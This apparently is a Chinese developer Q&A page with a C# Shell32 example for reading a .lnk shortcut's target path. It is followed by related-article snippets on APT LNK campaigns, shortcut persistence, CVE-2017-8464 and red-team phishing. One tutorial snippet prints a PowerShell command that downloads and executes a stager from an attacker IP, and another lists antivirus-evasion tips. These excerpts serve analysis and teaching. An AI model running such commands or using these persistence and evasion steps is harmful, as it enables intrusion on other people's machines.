首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

是否在C# .NET核心中读取.lnk文件的目标?

在C# .NET核心中,可以使用Shell32库来读取.lnk文件的目标。Shell32库是Windows操作系统的一部分,它提供了访问Shell功能的接口。通过使用Shell32库,可以获取.lnk文件的目标路径、图标、描述等信息。

以下是一个示例代码,演示如何在C# .NET核心中读取.lnk文件的目标路径:

代码语言:txt
复制
using System;
using System.IO;
using Shell32;

public class LnkReader
{
    public static string GetTargetPath(string lnkFilePath)
    {
        string targetPath = string.Empty;

        if (File.Exists(lnkFilePath))
        {
            Shell shell = new Shell();
            Folder folder = shell.NameSpace(Path.GetDirectoryName(lnkFilePath));
            FolderItem folderItem = folder.ParseName(Path.GetFileName(lnkFilePath));

            if (folderItem != null)
            {
                ShellLinkObject link = (ShellLinkObject)folderItem.GetLink;
                targetPath = link.Path;
            }
        }

        return targetPath;
    }
}

public class Program
{
    public static void Main(string[] args)
    {
        string lnkFilePath = "path_to_your_lnk_file.lnk";
        string targetPath = LnkReader.GetTargetPath(lnkFilePath);

        Console.WriteLine("Target Path: " + targetPath);
    }
}

请注意,上述代码中使用了Shell32库,因此需要在项目中添加对Interop.Shell32.dll的引用。可以通过NuGet包管理器或手动添加引用来完成。

这是一个简单的示例,通过调用LnkReader.GetTargetPath方法并传入.lnk文件的路径,即可获取目标路径。你可以根据需要进一步扩展该代码,以满足其他需求。

腾讯云相关产品和产品介绍链接地址:

  • 腾讯云对象存储(COS):https://cloud.tencent.com/product/cos
  • 腾讯云云服务器(CVM):https://cloud.tencent.com/product/cvm
  • 腾讯云容器服务(TKE):https://cloud.tencent.com/product/tke
  • 腾讯云人工智能(AI):https://cloud.tencent.com/product/ai
  • 腾讯云数据库(TencentDB):https://cloud.tencent.com/product/cdb
  • 腾讯云区块链(BCS):https://cloud.tencent.com/product/bcs
  • 腾讯云物联网(IoT):https://cloud.tencent.com/product/iot
  • 腾讯云移动开发(MPS):https://cloud.tencent.com/product/mps
页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

看我是如何用C#编写一个小于8KB贪吃蛇游戏

这篇文章是作为一个实验而出现,目的是找出一个有用自包含运行时C#可执行文件可以有多小。C#应用程序能否达到用户会认为瞬间就能下载完毕大小?它是否能使C#被用于现在还没有被使用场景?...C#编译器属于一组以虚拟机为目标的编译器(Java和Kotlin是该组另一个知名语言):C#编译器输出是一个可执行文件,需要某种虚拟机(VM)来执行。...人们不能只安装一个裸机操作系统,并期望能够在上面运行由C#编译器产生程序。 至少Windows上,过去人们可以依靠在整个机器上安装.NET Framework来运行C#编译器输出。...游戏循环中,我们要求蛇更新它位置并检查它是否吃了自己。然后我们画出蛇,检查键盘输入,用食物对蛇进行测试,并将所有内容渲染到控制台。 这就差不多了。让我们看看我们尺寸方面的情况。...产生EXE包括游戏、.NET运行时和作为.NET标准部分基础类库。你可能会说 "仍然比Electron好",但让我们看看我们是否能做得更好。

64420
  • SharPersist:一款渗透测试中实现Windows系统常驻套件

    背景 PowerShell在过去几年里Offensive安全社区被广泛使用。但随着防御性安全行业推进,正致使攻击性工具包从PowerShell迁移到反射C#以逃避现代安全产品检测。...它是一个用C#编写命令行工具,可以反射性加载Cobalt Strike“execute-assembly”命令或任何其他支持反射性加载.NET程序集框架。...磁盘上添加/修改文件?...启动文件夹持久性 在此示例中,我们将创建一个名为“Test.lnkLNK文件,该文件将放在当前用户启动文件夹中,并将执行“cmd.exe/c calc.exe”,如下图所示。 ?...同样,你可以使用“-m remove”参数删除启动文件夹持久性,如下图所示。这将从当前用户启动文件夹中删除LNK文件。 ?

    1.8K00

    蛇从暗黑中袭来——响尾蛇(SideWinder) APT组织2020年上半年活动总结报告

    本小组也一直对该小组活动加以跟踪。 2020上半年活动中该组织主要目标依然是巴基斯坦,中国,孟加拉国以及其他东南亚国家,其主要是集中政府,军事领域。...基本针对每个目标的攻击活动中,我们都发现其使用两种载荷交替攻击情况。 一.针对巴基斯坦活动: 下图为该组织针对巴基斯坦活动所投放LNK文件: ?...图片7-lnk载荷参数 所请求远程hta文件,该组织以自写解密算法取代了之前硬编码,不过核心与上一篇文章我们所描述一样,在内存加载.Netdll文件LinkZip.dll ?...或者通过进程遍历查找rekeywiz.exe打开其路径是否于%windir%\System32或者%windir%\syswow64下,如果不存在观察是否存在同目录下随机名tmp文件,如果存在需要将其清空...另外需要注意是CVE-2020-0674漏洞win7上很难打上补丁,由于win7已经停服,请广大win7用户务必检查自己jscript.dll文件版本是否小于5.8.9600.19626这个版本,

    1.1K20

    蛇从暗黑中袭来——响尾蛇(SideWinder) APT组织2020年上半年活动总结报告

    本小组也一直对该小组活动加以跟踪。 2020上半年活动中该组织主要目标依然是巴基斯坦,中国,孟加拉国以及其他东南亚国家,其主要是集中政府,军事领域。...基本针对每个目标的攻击活动中,我们都发现其使用两种载荷交替攻击情况。...图片7-lnk载荷参数 所请求远程hta文件,该组织以自写解密算法取代了之前硬编码,不过核心与上一篇文章我们所描述一样,在内存加载.Netdll文件LinkZip.dll 图片8-第一阶段...或者通过进程遍历查找rekeywiz.exe打开其路径是否于%windir%\System32或者%windir%\syswow64下,如果不存在观察是否存在同目录下随机名tmp文件,如果存在需要将其清空...另外需要注意是CVE-2020-0674漏洞win7上很难打上补丁,由于win7已经停服,请广大win7用户务必检查自己jscript.dll文件版本是否小于5.8.9600.19626这个版本,

    66720

    贼心不死,海莲花APT组织一季度攻击活动揭秘

    一、背景 “海莲花”(又名APT32、OceanLotus),被认为是来自越南APT攻击组织,自2012年活跃以来,一直针对中国敏感目标进行攻击活动,是近几年来针对中国大陆进行攻击活动最活跃APT...3、 恶意文件植入 1) 恶意lnk分析 1月一波攻击中,该组织会在所有的投递压缩包里,都存放一个恶意lnk,但是所有的lnk文件都类似(执行地址不能,但是内容一致)。...lnk文件图标伪装成word图标。值得注意是,该lnk图标会从网络获取,因此如果远程服务器已经关闭,会导致该lnk无图标的现象。...此外,我们还发现有比较早前攻击活动中,同样使用360软件管理来做为白加黑载体: ? 该样本会读取c:\windows\system32.ini文件读取1字节作为key: ? ?...读取并解密资源icon下1资源,得到一个字符串wsc_proxy.exe,比较当前进程是否为wsc_proxy.exe,如果是则继续: ?

    1.8K20

    红队之外网定向打点

    抢注过期域名 expireddomains.net DELETE DOMAIN tips1: 不要包含世界大厂和杀毒厂商相关域名,以及和目标相关域名 tips2:注册目标相关区域常见域名,记得开隐私保护...,只某个时间段请求payload 不要把非payloaduri重定向到google等高信誉域名 建议:www.aaa.com搭建来养域名,使用c2.aaa.com二级域名做C2 DNS socat...,通过DLL劫持方案加载恶意DLL;比较容易过AV,但需要解压执行 LNK文件钓鱼:链接对象是Powershell,进程链完善 PPT钓鱼样本:PPT超链接,弹出“安全声明”,不用启动宏,但必须全屏播放...LNK钓鱼邮件制作 短文件名 POWERS~1.EXE 代码混淆 参考赛门铁克paper 安全类进程检测 遍历进程,获取进程对应版权信息,与黑名单列表比对 优点:升级版本也不变,通用 进程名检测 窗口标题检测...将Word塞到lnk文件尾部(推荐使用) 钓鱼简历编写:内容可选浮夸,让HR打开看完后大概率删除,防止提给技术人员 LNK图标的显示:改成各个系统都能默认显示通用图标 如何隐藏行为:SetShowCmd

    3.9K41

    疑似响尾蛇APT组织利用冠状病毒相关信息传播恶意lnk文件

    进入anyrun可见该样本是一个hta文件,且其标题与lnk文件相同,且其网络行为中域名也与lnk文件后续域名相同。因此可判定该样本即为lnk文件后续 ?...样本分析 样本以巴基斯坦军队抗击冠状病毒为诱饵,并假装是pdf快捷链接,诱导受害者点击执行,一旦受害者执行,该lnk文件将会从http://www[.]d01fa[.]net/cgi/8ee4d36866...Duser.dll加载起来后,将读取所在目录下tmp文件,并解密加载该文件 ? 由于dnspy不能直接调试dll,所以可将该解密算法直接拷贝到vs里,解密文件写入即可 ?...收集特定文件类型信息保存到%programdata%\fontFiles\font目录下随机名.fls中 ? 4.获取文件保存 ? 5.更新c2地址 ? 6.更新是否上传指定文件参数 ?...关联 此次样本与之前披露响尾蛇样本基本一致 ? 且其c2: cloud-apt.net各威胁平台上都有响尾蛇tag ? ?

    94720

    一个 .net 病毒分析过程

    本文作者:病毒分析小组全体成员 样本概述 本次样本为 Lnk 文件,内嵌了一个 Powershell 脚本,用于后续释放和攻击…… md5 为 13d3d78aa4d28311e8e57ca01d34d11f...详细分析 对 Lnk 文件使用 010editor 解析并从命令行提取出有效 payload 如下,根据经验判断为 Invoke-Obfuscation 混淆后代码。...,pem 证书文件,用于劫持 Hosts 文件 pem 证书文件如下: ?...NSIS 脚本文件中,将释放出来 AlphaPassive.msi 添加启动项,用于网页劫持 ? 系统中如下 ?...当 C# 程序中存在 System.Configuration.Install.Installer 类派生类时,如果通过 InstallUtil 程序启动,则程序不会从正常入口点执行,而是从派生类中

    1.6K20

    威胁情报 | 海莲花 APT 组织模仿 APT29 攻击活动分析

    概述 参考资料 2023年11月,知道创宇404高级威胁情报团队成功捕获到海莲花组织最新攻击样本。该样本以购买BMW汽车为主题,诱导攻击目标执行恶意文件。...该文件内置了四部分内容,分别是:lnk参数、诱饵文档、dropper程序和hta文件,四部分内容通过相互配合完成既定功能目标。...拷贝逻辑根据是否存在原始文件名称LNK文件区分为两种,若是原始文件名称LNK文件存在则直接拷贝;若不存在则遍历%USERPROFILE%路径查找原始文件名称LNK文件,找到之后将文件拷贝到%USERPROFILE...该部分区分代码可用于以下功能检测: 文件名称是否被更改 可能原始落地文件%USERPROFILE%路径下 两个LNK文件参数基本一致 3.2 NTUSER.DAT{9a91c082-225a-4f2c...,白程序启动lnk参数部分实现: 启动白文件文件信息 白文件(LenovoDesk.exe)在运行后,通过加载QuickDeskBand.dll并调用其ShowBatteryGauge函数: 加载黑文件

    66010

    lnk2001 lnk1120_lnk1120

    如果连接程序不能在所有的库和目标文件内找到所引用函数、变量或标签,将产生此错误消息。...2.如果使用内联函数是.CPP文件内定义,而不是文件内定义将导致LNK2001错误。   3.调用函数时如果所用参数类型同函数声明时类型不符将会产生LNK2001。   ...二.由于编译和链接设置而造成LNK2001   1.如果编译时使用是/NOD(/NODEFAULTLIB)选项,程序所需要运行库和MFC库连接时由编译器写入目标文件模块, 但除非在文件中明确包含这些库名...3.使用/MD选项编译时,既然所有的运行库都被保留在动态链接库之内,源文件中对“func”引用,目标文件里即对“__imp__func” 引用。... Visual C++ .NET 2003 中,如果使用了 /clr 而未将 CRT 链接到可执行文件,将生成此错误。

    99520

    Window权限维持(四):快捷方式

    现有快捷方式目标字段将被修改以执行存储注册表项中base64脚本。 usemodule persistence/userland/backdoor_lnk ?...将这些快捷方式放置启动文件夹中以保持持久性将是一个微不足道过程,因为假定已经存在与命令和控制服务器通信。 lnk2pwn是用Java编写工具,可用于制作恶意快捷方式。...EmpireEmpire包含一个持久性模块,该模块可以后门合法快捷方式(.LNK),以执行任意PowerShell有效负载。现有快捷方式目标字段将被修改以执行存储注册表项中base64脚本。...可以通过执行以下命令来调用此技术:install-persistence 3PoshC2 –启动LNK文件Windows登录期间,快捷方式将尝试注册表项上执行值,该注册表项包含base64格式stager...将这些快捷方式放置启动文件夹中以保持持久性将是一个微不足道过程,因为假定已经存在与命令和控制服务器通信。lnk2pwn是用Java编写工具,可用于制作恶意快捷方式。

    1.3K30

    通过“震网三代”和Siemens PLC 0day漏洞,实现对工控系统入侵实验

    紧接着,工厂大量离心机无缘无故损坏,科学家束手无策,工厂被迫关闭,延迟核计划。这就是2010年曝光“震网事件(Stuxnet)”。 ?...图2 “震网”事件 而攻击伊朗工厂漏洞利用工具就是“震网一代”,它因此被公认为世界上首个网络“超级破坏性武器”。...图3 攻击U盘 0x01 漏洞 1 CVE-2017-8464 2017年6月14日,微软发布编号为CVE-2017-8464漏洞公告,官方介绍Windows系统解析快捷方式时存在远程执行任意代码高危漏洞...通过VS2008编译成名为attacker.exe文件,该文件运行时,先连接上PLC, 然后发送攻击包,最后导致离心机转动异常。 ?...工程师站PC中U盘可用盘符为E盘。 其参数设置如下图5: ? 图5 参数设置 执行后,/root/.msf4/local/生成24个利用文件,如下图6: ? 图6 exploit ?

    2.1K41

    C#通过获取快捷方式指向目标的小示例触碰WMI

    .Net本身没有封装对快捷方式操作类,所以要在C#中操作快捷方式,需要借助“外力”。市面上常见方法是通过Windows Script Host Object Model这个COM组件来完成。...这种方法缺憾是你程序必须带上Interop.IWshRuntimeLibrary.dll这个文件(不过也许可以把这个dll并入exe中再动态加载什么)。...WQL查询语言(SQL它妹)获取资源信息,我也是现学现用,抛砖引玉,告知还不知道童鞋们除了Win32 API,还有WMI这货可以解决某些.Net解决不了问题,所以~WMI大牛撸过即可。...Console.WriteLine("{0} 指向目标:{1}", obj["name"], obj["Target"]); } Console.ReadKey...http://www.ks-soft.net/hostmon.eng/wmi/index.htm 3、还是WMI Explorer,只是主人不同,来自脚本工具大家人户SAPIEN,但目前它官网找不到该工具下载入口

    62820

    “震网三代”(CVE-2017-8464)几种利用方法与防范

    2.仅复制rb文件会出错,须再将压缩包内data/exploits中cve-2017-8464文件夹复制到/usr/share/metasploit-framework/data/exploits中。...首先下载Export-LNKPwn.ps1 注意: -需要4.0或以上.NET库版本,作者使用了一些只有PowerShell 5.0才有的构造函数(如new()),他打算将版本要求降低到....NET 3.5 和PowerShell 2.0,这样的话模块在所有目标环境中都能被载入内存。...-作者想拓展函数,让用户可以生成原始震网LNK exp(CVE-2010-2568),并解决绕过问题(CVE-2015-0096). -杀毒软件会处理你LNK,多准备来躲避检测!...参数说明: LNKOutPath:本地保存LNK文件全路径。 TargetCPLPath:本地/远程目标cpl全路径。

    2K40

    恶意代码分析:2.LNK文件伪装成证书传播RokRAT恶意软件(含无文件攻击)

    这篇文章将翻译一篇LNK文件发起恶意攻击,主要是LNK文件伪装成证书执行RokRAT恶意软件,并利用Powershell命令发起无文件攻击和执行相关行为。基础性技术文章,希望您喜欢!...RokRAT恶意软件简化操作过程如下所示,是一种比较常见LNK攻击: 通过Email发起鱼叉式钓鱼攻击,包括恶意LNK文件(可执行Powershell) 整个LNK文件包含:正常PDF文件、viwer.dat...接着,“search.dat”以无文件攻击方式读取并执行“viewer.dat”文件。...、IP、路由器信息等) 此外,还可以执行其他恶意行为,并且收集到信息在上传至攻击者云服务器之前,会先存储%TEMP%文件夹中。...分析过程中所识别出攻击者电子邮件地址如下。

    15210

    社工钓鱼之LNK钓鱼

    文章前言 LNK文件是一种用于指向其他文件特殊文件,这些文件通常也被称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速调用, LNK钓鱼主要将图标伪装成正常图标,但是目标会执行Shell...命令 钓鱼实践 Step 1:点击Attacks—>Web Drive by—>Scripted Web Delivery,弹出对话框中将type类型设置为Powershell,然后单击launch...生成代码 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.129...文件 Step 5:后将Al1ex.lnk发送给受害者,诱导用户运行 Step 6:之后成功获得Shell 文末小结 基于LNK文件钓鱼方式总体而言利用难度相对有点大,一般都需要通过钓鱼邮件方式...(例如:投递压缩包并附加Link文件)进行利用,不过作为一种后渗透阶段权限维持方式也还是挺不错,但是就得看点击率了~

    1.5K20

    Active APT

    尽管他们工具能够下载和执行可能更加隐秘任意二进制文件,但该组织主要关注点似乎是试图窃取数据同时尽可能快地目标网络中传播。我们会错过什么吗?...值得注意是,有两个文本文件,一个用于 Word,一个用于 Excel,包含要插入目标文档恶意宏 VBA 源代码,以及负责查找和破坏现有文档 .NET 程序集。...image.png 图 7. .NET 模块负责下载和执行存储 github.com 上有效负载 该存储库包含一个文件 — readme.txt — 这是一个 base64 编码 .NET 下载器可执行文件...为了知道文档是否是新,该模块一个文本文件中为每个上传到服务器文件保留一个 MD5 哈希值。这些 MD5 哈希不是基于文件内容,而是基于由文件名、文件大小和最后修改时间组成字符串。...C# 后门线程创建例程 批处理文件/VBScript 此版本包含多个脚本,以批处理文件形式和 VBScript 编写。但是,最终目标是相同:扫描系统以查找敏感文档。

    8K00
    领券